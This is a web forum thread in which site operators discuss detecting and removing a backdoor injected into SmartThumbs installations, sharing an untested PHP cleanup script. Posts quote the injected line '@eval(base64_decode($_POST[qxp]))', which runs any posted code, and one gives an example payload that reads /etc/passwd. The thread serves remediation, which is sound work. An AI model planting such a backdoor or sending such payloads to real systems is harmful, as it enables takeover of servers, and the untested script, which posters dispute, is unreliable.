removing ST exploit

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • MMarko
    Confirmed User
    • Jun 2007
    • 160

    #1

    removing ST exploit

    I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

    Remove SmartThumbs exploit in 5 steps
    dlXer - web design, developing, managed hosting, website optimizations
  • boneless
    Confirmed User
    • Dec 2002
    • 3625

    #2
    i read it and got a small question:

    it says if you got the include line and the base64 line then youre still infected.

    i only got this one:
    @eval(base64_decode($_POST[qxp]));//';

    does that mean im not infected, or still infected?
    icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

    Comment

    • boneless
      Confirmed User
      • Dec 2002
      • 3625

      #3
      damn just found the other line as well, except it aint including sesa.tmp but webcam.tmp.

      should i show the post you made to my sys admin and have them take care of it? or do it myself, as i dont have access to phpmyadmin. my host normally does that type of stuff.

      is there any other way besides phpmyadmin to do this?
      icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

      Comment

      • MMarko
        Confirmed User
        • Jun 2007
        • 160

        #4
        you're infected for sure

        well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable to edit table values
        dlXer - web design, developing, managed hosting, website optimizations

        Comment

        • k0nr4d
          Confirmed User
          • Aug 2006
          • 9231

          #5
          untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

          PHP Code:
          <?php
          $dbserver = '';
          $dbuser = ''; 
          $dbpass = ''; 
          $dbname = ''; 
          $dblink = mysql_connect($dbserver,$dbuser,$dbpass);
          mysql_select_db($dbname,$dblink);
          
          copy("st/admin/variables.php","tmp/variables.bak"); 
          $string = file_get_contents("st/admin/variables.php");
          $string = str_replace("@eval(base64_decode($_POST[qxp]));//’;","",$string); 
          file_put_contents("st/admin/variables.php",$string);
          unlink("/tmp/sesa.tmp");
          unlink("/tmp/webcam.tmp");
          include('st/admin/variables.php'); 
          mysql_query("UPDATE st_settings SET niche = '$niche'");
          exit("Done"); 
          ?>
          Last edited by k0nr4d; 05-08-2010, 07:23 AM.
          Mechanical Bunny Media
          Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

          Comment

          • grumpy
            Too lazy to set a custom title
            • Jan 2002
            • 9870

            #6
            Originally posted by k0nr4d
            untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.

            PHP Code:
            <?php
            $dbserver = '';
            $dbuser = ''; 
            $dbpass = ''; 
            $dbname = ''; 
            $dblink = mysql_connect($dbserver,$dbuser,$dbpass);
            mysql_select_db($dbname,$dblink);
            
            copy("st/admin/variables.php","tmp/variables.bak"); 
            $string = file_get_contents("st/admin/variables.php");
            $string = str_replace("@eval(base64_decode($_POST[qxp]));//?;","",$string); 
            file_put_contents("st/admin/variables.php",$string);
            unlink("/tmp/sesa.tmp");
            unlink("/tmp/webcam.tmp");
            include('st/admin/variables.php'); 
            mysql_query("UPDATE st_settings SET niche = '$niche'");
            exit("Done"); 
            ?>

            $niche is undefined
            Don't let greediness blur your vision | You gotta let some shit slide
            icq - 441-456-888

            Comment

            • k0nr4d
              Confirmed User
              • Aug 2006
              • 9231

              #7
              Originally posted by grumpy
              $niche is undefined
              Sure it is, its including the variables.php file before inserting it
              Mechanical Bunny Media
              Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

              Comment

              • PXN
                Confirmed User
                • Jun 2008
                • 1548

                #8
                nice stuff. Thanks for sharing.

                Comment

                • MMarko
                  Confirmed User
                  • Jun 2007
                  • 160

                  #9
                  Code:
                  $dbserver = '';
                  $dbuser = ''; 
                  $dbpass = ''; 
                  $dbname = '';
                  you should include st/classes/mysql.php before that... and remove those lines completely...

                  however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup...
                  Last edited by MMarko; 05-08-2010, 03:52 PM.
                  dlXer - web design, developing, managed hosting, website optimizations

                  Comment

                  • rowan
                    Too lazy to set a custom title
                    • Mar 2002
                    • 17393

                    #10
                    Originally posted by boneless
                    i read it and got a small question:

                    it says if you got the include line and the base64 line then youre still infected.

                    i only got this one:
                    @eval(base64_decode($_POST[qxp]));//';

                    does that mean im not infected, or still infected?
                    FYI that little bit of code executes whatever is passed in variable 'qxp'

                    So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file)

                    Comment

                    • Davy
                      Confirmed User
                      • Apr 2006
                      • 4323

                      #11
                      Originally posted by boneless
                      @eval(base64_decode($_POST[qxp]));
                      Holy shit. Who in the right state of mind would add such a code to their product? Yikes!
                      ---
                      ICQ 14-76-98 <-- I don't use this at all

                      Comment

                      • CyberHustler
                        Masterbaiter
                        • Feb 2006
                        • 28735

                        #12
                        “If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”

                        Comment

                        • LoveSandra
                          So Fucking Banned
                          • Aug 2008
                          • 10551

                          #13
                          wtf.......................

                          Comment

                          • nation-x
                            Confirmed User
                            • Mar 2004
                            • 5370

                            #14
                            Originally posted by Davy
                            Holy shit. Who in the right state of mind would add such a code to their product? Yikes!
                            uuuuuhhhhh wut??

                            Comment

                            • Davy
                              Confirmed User
                              • Apr 2006
                              • 4323

                              #15
                              Originally posted by nation-x
                              uuuuuhhhhh wut??
                              This thread is about a security exploit. I thought the info above was the security hole.
                              ---
                              ICQ 14-76-98 <-- I don't use this at all

                              Comment

                              • u-Bob
                                there's no $$$ in porn
                                • Jul 2005
                                • 33063

                                #16
                                if you box was compromised, there's only 1 thing to do: reinstall everything.

                                Comment

                                • MMarko
                                  Confirmed User
                                  • Jun 2007
                                  • 160

                                  #17
                                  lol, yes and for every wordpress exploit everyone should reinstall whole box :D

                                  don't be silly
                                  dlXer - web design, developing, managed hosting, website optimizations

                                  Comment

                                  • u-Bob
                                    there's no $$$ in porn
                                    • Jul 2005
                                    • 33063

                                    #18
                                    Originally posted by MMarko
                                    lol, yes and for every wordpress exploit everyone should reinstall whole box :D
                                    simple answer: yes.

                                    Comment

                                    • Shoplifter
                                      Richest man in Babylon
                                      • Jan 2002
                                      • 5845

                                      #19
                                      Bumping this to the top. I think this exploit is not getting the attention it deserves.

                                      We cleaned a number of sites and in some case the exploit was back in 3 hours.

                                      Comment

                                      • Tulku
                                        Confirmed User
                                        • Aug 2003
                                        • 672

                                        #20
                                        Bumping ..

                                        Comment

                                        Working...